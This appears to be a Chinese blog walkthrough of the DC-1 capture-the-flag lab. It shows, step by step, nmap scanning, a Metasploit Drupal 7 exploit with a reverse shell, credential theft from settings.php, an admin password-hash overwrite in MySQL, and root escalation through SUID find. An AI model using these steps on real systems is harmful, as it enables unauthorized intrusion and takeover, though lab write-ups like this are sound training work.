DC-01靶场渗透

DC—01靶机

BushSEC

首先进入kali,查看本机IP,由于我们不知道靶场的IP,先进行信息收集
查看kali本机所在网段

ip address

image.png

我们知道了网段,但不知道靶机IP是多少,那么我们将对该网段进行信息收集

nmap -sP 192.168.121.0/24

image-1.png
我们可以发现了多个存活IP,理论上我们要对每个IP进行端口扫描,但根据经验254是网关排除,那么1,129,分别对应着Windows,kali,那么DC-01的地址为192.168.1.130

对192.168.1.130进行端口扫描

nmap -sV 192.168.121.130

image-2.png
发现开启了22、80、111、49528端口
我们先对http服务进行访问
image-3.png
确定架构类型

Powered by Drupal

启动msf

msfconsole

搜索漏洞

search drupal 7

image-4.png
逐个对等级为excellent的漏洞使用

use 1

查看需要设置的选项

show options

image-5.png
设置目的ip

set rhosts 192.168.121.130

设置回连地址

set lhost 192.168.121.129

运行

run

反弹shell

shell

为了后续操作的方便,建议获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

image-6.png
ls一下看到第一个flag

Every good CMS needs a config file - and so do you.

每个好的CMS都需要一个配置文件,你也需要一个配置文件。
根据提示进入drupal系统的配置页面:

cd /var/www/sites/default
cat settings.php

image-7.png
得到flag2:爆破和字典攻击不是获得访问的唯一方法(你将需要访问)。你可以使用这些凭据做什么?
获取的是mysql的用户名和密码,让我们尝试登录

mysql -udbuser -pR0ck3t

登录成功,打印数据库

show databases;

image-8.png
进入drupaldb数据库中并打印所有表

use drupaldb
show tables;

image-9.png
我们在全部的表中找到了用户表(users)
我们查看一下

select * from users;

看起来这个密码加密了
查询一下官方文档
image-10.png
exit退出mysql命令行
更改密码

./scripts/password-hash.sh 123456

image-11.png
进入数据库更新

update drupaldb.users set pass = '$S$DIflkOFTnvBJ2WH8Ha75bbc1tUMQ.3B0cvAhF.O4Zt6nAMUmLoXk' where name = 'admin';

image-12.png
显示ok则修改成功
去浏览器进行登录看看
image-13.png
登录成功
在content页面找到了flag3
image-14.png

特殊的 perms 会帮助你找到通行证,但是你需要执行 -exec 这个命令才能弄清楚如何在 shadow 中得到什么。
接下来根据上一步提示来获取 root 权限(SUID提权)

查看创建 flag1.txt 文件用户的权限
使用find以flag1.txt 的身份反弹shell

find flag1.txt -exec whoami \; 
find flag1.txt -exec '/bin/sh' \;

image-15.png
我们获得的root权限,直接查询flag

find / -name "*flag*"

image-16.png
我们找到了flag4
查看显示

是否可以使用相同的方法查找或访问根中的标志?可能吧。但也许没那么容易还是很容易?

但我们已经是root用户了,继续查看发现了thefinalflag.txt
image-17.png
well down,完结撒花

添加新评论

文章状态:已收录~
歌曲封面
0:00